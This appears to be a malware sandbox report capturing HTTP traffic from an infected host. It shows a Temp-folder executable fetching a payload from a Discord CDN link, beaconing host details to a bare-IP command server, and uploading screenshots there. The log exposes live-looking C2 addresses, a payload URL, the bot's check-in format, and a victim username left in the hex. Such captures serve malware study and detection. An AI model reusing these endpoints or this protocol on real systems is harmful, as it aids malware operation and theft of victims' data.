                                        Aug 29, 2021 22:28:08.282047987 CEST13651OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:28:08.387507915 CEST13695INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        198192.168.2.44993746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.439291000 CEST13696OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:08.514889956 CEST13696INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        199192.168.2.44993846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.745563030 CEST13697OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:08.817559004 CEST13739INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.449736162.159.134.23380C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:09.138505936 CEST1060OUTGET /attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe HTTP/1.1
                                        Host: cdn.discordapp.com
                                        Aug 29, 2021 22:27:09.160326958 CEST1061INHTTP/1.1 301 Moved Permanently
                                        Date: Sun, 29 Aug 2021 20:27:09 GMT
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Cache-Control: max-age=3600
                                        Expires: Sun, 29 Aug 2021 21:27:09 GMT
                                        Location: https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe
                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v%2BfWnAE20NxUBeT719f9JVT1%2B1DixuzQDpzCi%2F2W7Ka87tmGpplf3QbJUFCgw2wsUqnp6XihQ0yN0C5WrctjUtxJs0x9HC7hnXWTs070fHD6qIE3Tp%2B06ysEBWZ5mTJ6ObsnEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 686884b62e8ad709-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        20192.168.2.44975546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:17.395796061 CEST3176OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:17.395904064 CEST3176OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:17.396135092 CEST3186OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:17.396259069 CEST3189OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:17.431163073 CEST3199OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:17.431245089 CEST3205OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:17.431271076 CEST3214OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:17.466422081 CEST3217OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:17.466548920 CEST3233OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:17.466594934 CEST3246OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:17.466725111 CEST3251OUTData Raw: 19 f8 79 ce 5e 07 56 3d 4f 97 5e 6c 2a e2 29 d5 9c fd 9b d4 f5 6a 61 f0 d5 68 c2 0a a5 ac 71 29 a6 dd b9 f9 6d e4 3f f0 1a b2 9e 1f d4 1f fe 58 10 3d f8 ae 92 6d 73 48 bc 07 ec da c3 5b 7b 3c 78 ac e9 ed ae ae 01 6b 6f 11 43 2a 9e db f6 d7 42 c6
                                        Data Ascii: y^V=O^l*)jahq)m?X=msH[{<xkoC*BU{_TI`)gTO]dh{J<?og\ZtQfyS^J>tb[G9EJN~>lJ_Q0LoQaq\y5KK4:9<aNO
                                        Aug 29, 2021 22:27:17.576267004 CEST3283INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        200192.168.2.44993946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.746604919 CEST13698OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:08.746686935 CEST13698OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:08.746871948 CEST13708OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:08.747014046 CEST13711OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:08.782047033 CEST13714OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:08.782083035 CEST13716OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:08.782293081 CEST13719OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:08.782453060 CEST13731OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:08.782474995 CEST13733OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:08.782619953 CEST13736OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:08.817544937 CEST13739OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:08.925587893 CEST13806INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        201192.168.2.44994046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.980227947 CEST13807OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:09.054538012 CEST13807INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        202192.168.2.44994146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:09.345271111 CEST13808OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:09.415612936 CEST13847INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        203192.168.2.44994246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:09.345724106 CEST13808OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:09.345828056 CEST13808OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:09.345993996 CEST13819OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:09.346146107 CEST13821OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:09.381448030 CEST13829OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:09.381498098 CEST13835OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:09.381520987 CEST13837OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:09.381680965 CEST13841OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:09.381792068 CEST13847OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:09.416989088 CEST13850OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
